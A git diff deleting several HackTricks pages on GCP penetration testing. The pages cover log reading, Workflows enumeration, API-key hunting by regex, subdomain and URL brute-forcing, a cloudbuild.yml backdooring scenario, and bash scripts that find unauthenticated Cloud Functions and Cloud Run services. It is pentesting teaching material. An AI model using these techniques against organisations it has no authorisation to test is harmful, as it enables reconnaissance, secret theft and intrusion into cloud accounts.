- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [Stackdriver logging](https://cloud.google.com/sdk/gcloud/reference/logging/) - -[**Stackdriver**](https://cloud.google.com/stackdriver/) is recognized as a comprehensive infrastructure **logging suite** offered by Google. It has the capability to capture sensitive data through features like syslog, which reports individual commands executed inside Compute Instances. Furthermore, it monitors HTTP requests sent to load balancers or App Engine applications, network packet metadata within VPC communications, and more. - -For a Compute Instance, the corresponding service account requires merely **WRITE** permissions to facilitate logging of instance activities. Nonetheless, it's possible that an administrator might **inadvertently** provide the service account with both **READ** and **WRITE** permissions. In such instances, the logs can be scrutinized for sensitive information. - -To accomplish this, the [gcloud logging](https://cloud.google.com/sdk/gcloud/reference/logging/) utility offers a set of tools. Initially, identifying the types of logs present in your current project is recommended. - -```bash -# List logs -gcloud logging logs list - -# Read logs -gcloud logging read [FOLDER] - -# Write logs -# An attacker writing logs may confuse the Blue Team -gcloud logging write [FOLDER] [MESSAGE] - -# List Buckets -gcloud logging buckets list -``` - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) -* [https://initblog.com/2020/gcp-post-exploitation/](https://initblog.com/2020/gcp-post-exploitation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md deleted file mode 100644 index 4e909b9c1..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md +++ /dev/null @@ -1,67 +0,0 @@ -# GCP - Workflows Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Google Cloud Platform (GCP) Workflows** is a service that helps you automate tasks that involve **multiple steps** across Google Cloud services and other web-based services. Think of it as a way to set up a **sequence of actions** that run on their own once triggered. You can design these sequences, called workflows, to do things like process data, handle software deployments, or manage cloud resources without having to manually oversee each step. - -### Encryption - -Related to encryption, by default the **Google-managed encryption key is use**d but it's possible to make it use a key of by customers. - -## Enumeration - -{% hint style="danger" %} -You can also check the output of previous executions to look for sensitive information -{% endhint %} - -{% code overflow="wrap" %} -```bash -# List Workflows -gcloud workflows list - -# Get info and yaml of an specific workflow -gcloud workflows describe - -# List executions -gcloud workflows executions list workflow-1 - -# Get execution info and output -gcloud workflows executions describe projects//locations//workflows//executions/ -``` -{% endcode %} - -### Privesc and Post Exploitation - -{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %} -[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md deleted file mode 100644 index fd78bc1bb..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md +++ /dev/null @@ -1,44 +0,0 @@ -# GCP - Unauthenticated Enum & Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Public Assets Discovery - -One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`) - -Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**. - -## Public Resources Brute-Force - -### Buckets, Firebase, Apps & Cloud Functions - -* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions -* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md deleted file mode 100644 index 80e5cfb49..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md +++ /dev/null @@ -1,78 +0,0 @@ -# GCP - API Keys Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## API Keys - -For more information about API Keys check: - -{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} -[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md) -{% endcontent-ref %} - -### OSINT techniques - -**Google API Keys are widely used by any kind of applications** that uses from the client side. It's common to find them in for websites source code or network requests, in mobile applications or just searching for regexes in platforms like Github. - -The regex is: **`AIza[0-9A-Za-z_-]{35}`** - -Search it for example in Github following: [https://github.com/search?q=%2FAIza%5B0-9A-Za-z\_-%5D%7B35%7D%2F\&type=code\&ref=advsearch](https://github.com/search?q=%2FAIza%5B0-9A-Za-z_-%5D%7B35%7D%2F\&type=code\&ref=advsearch) - -### Check origin GCP project - `apikeys.keys.lookup` - -This is extremely useful to check to **which GCP project an API key that you have found belongs to**: - -```bash -# If you have permissions -gcloud services api-keys lookup AIzaSyD[...]uE8Y -name: projects/5[...]6/locations/global/keys/28d[...]e0e -parent: projects/5[...]6/locations/global - -# If you don't, you can still see the project ID in the error msg -gcloud services api-keys lookup AIzaSy[...]Qbkd_oYE -ERROR: (gcloud.services.api-keys.lookup) PERMISSION_DENIED: Permission 'apikeys.keys.lookup' denied on resource project. -Help Token: ARD_zUaNgNilGTg9oYUnMhfa3foMvL7qspRpBJ-YZog8RLbTjCTBolt_WjQQ3myTaOqu4VnPc5IbA6JrQN83CkGH6nNLum6wS4j1HF_7HiCUBHVN -- '@type': type.googleapis.com/google.rpc.PreconditionFailure - violations: - - subject: ?error_code=110002&service=cloudresourcemanager.googleapis.com&permission=serviceusage.apiKeys.getProjectForKey&resource=projects/89123452509 - type: googleapis.com -- '@type': type.googleapis.com/google.rpc.ErrorInfo - domain: apikeys.googleapis.com - metadata: - permission: serviceusage.apiKeys.getProjectForKey - resource: projects/89123452509 - service: cloudresourcemanager.googleapis.com - reason: AUTH_PERMISSION_DENIED -``` - -### Brute Force API endspoints - -As you might not know which APIs are enabled in the project, it would be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md deleted file mode 100644 index b6340a72b..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - App Engine Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Engine - -For more information about App Engine check: - -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} - -### Brute Force Subdomains - -As mentioned the URL assigned to App Engine web pages is **`.appspot.com`** and if a service name is used it'll be: **`-dot-.appspot.com`**. - -As the **`project-uniq-name`** can be set by the person creating the project, they might be not that random and **brute-forcing them could find App Engine web apps exposed by companies**. - -You could use tools like the ones indicated in: - -{% content-ref url="./" %} -[.](./) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md deleted file mode 100644 index 2e3594d5a..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Artifact Registry Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### Dependency Confusion - -Check the following page: - -{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %} -[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md deleted file mode 100644 index 57d506c09..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# GCP - Cloud Build Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Build - -For more information about Cloud Build check: - -{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %} -[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md) -{% endcontent-ref %} - -### cloudbuild.yml - -If you compromise write access over a repository containing a file named **`cloudbuild.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a Cloud Build and exfiltrate the secrets, compromise what is done and also compromise the **Cloud Build service account.** - -{% hint style="info" %} -Note that GCP has the option to allow administrators to control the execution of build systems from external PRs via "Comment Control". Comment Control is a feature where collaborators/project owners **need to comment “/gcbrun” to trigger the build** against the PR and using this feature inherently prevents anyone on the internet from triggering your build systems. -{% endhint %} - -For some related information you could check the page about how to attack Github Actions (similar to this): - -{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %} -[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/) -{% endcontent-ref %} - -### PR Approvals - -When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`. - -
- -{% hint style="danger" %} -Therefore, is this is set to **`Not required`**, an attacker could perform a **PR to the branch** that will trigger the execution adding the malicious code execution to the **`cloudbuild.yml`** file and compromise the cloudbuild execution (note that cloudbuild will download the code FROM the PR, so it will execute the malicious **`cloudbuild.yml`**). -{% endhint %} - -Moreover, it's easy to see if some cloudbuild execution needs to be performed when you send a PR because it appears in Github: - -
- -{% hint style="warning" %} -Then, even if the cloudbuild is not executed the attacker will be able to see the **project name of a GCP project** that belongs to the company. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md deleted file mode 100644 index ba70bc1d7..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md +++ /dev/null @@ -1,103 +0,0 @@ -# GCP - Cloud Functions Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Functions - -More information about Cloud Functions can be found in: - -{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} -[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md) -{% endcontent-ref %} - -### Brute Force URls - -**Brute Force the URL format**: - -* `https://-.cloudfunctions.net/` - -It's easier if you know project names. - -Check this page for some tools to perform this brute force: - -{% content-ref url="./" %} -[.](./) -{% endcontent-ref %} - -### Enumerate Open Cloud Functions - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_functions.sh) you can find Cloud Functions that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Functions that permit unauthenticated invocations -# anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Functions API") - - if [ -z "$enabled" ]; then - continue - fi - - - for func_region in $(gcloud functions list --quiet --project "$proj" --format="value[separator=','](NAME,REGION)"); do - # drop substring from first occurence of "," to end of string. - func="${func_region%%,*}" - # drop substring from start of string up to last occurence of "," - region="${func_region##*,}" - ACL="$(gcloud functions get-iam-policy "$func" --project "$proj" --region "$region")" - - all_users="$(echo "$ACL" | grep allUsers)" - all_auth="$(echo "$ACL" | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $func" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $proj: $func" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md deleted file mode 100644 index fbb978d13..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md +++ /dev/null @@ -1,85 +0,0 @@ -# GCP - Cloud Run Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -For more information about Cloud Run check: - -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} - -### Enumerate Open Cloud Run - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Run services that permit unauthenticated -# invocations anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Run API") - - if [ -z "$enabled" ]; then - continue - fi - - - for run in $(gcloud run services list --platform managed --quiet --project $proj --format="get(name)"); do - ACL="$(gcloud run services get-iam-policy $run --platform managed --project $proj)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $run" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $proj: $run" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md deleted file mode 100644 index 1fa4e18a2..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md +++ /dev/null @@ -1,49 +0,0 @@ -# GCP - Cloud SQL Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
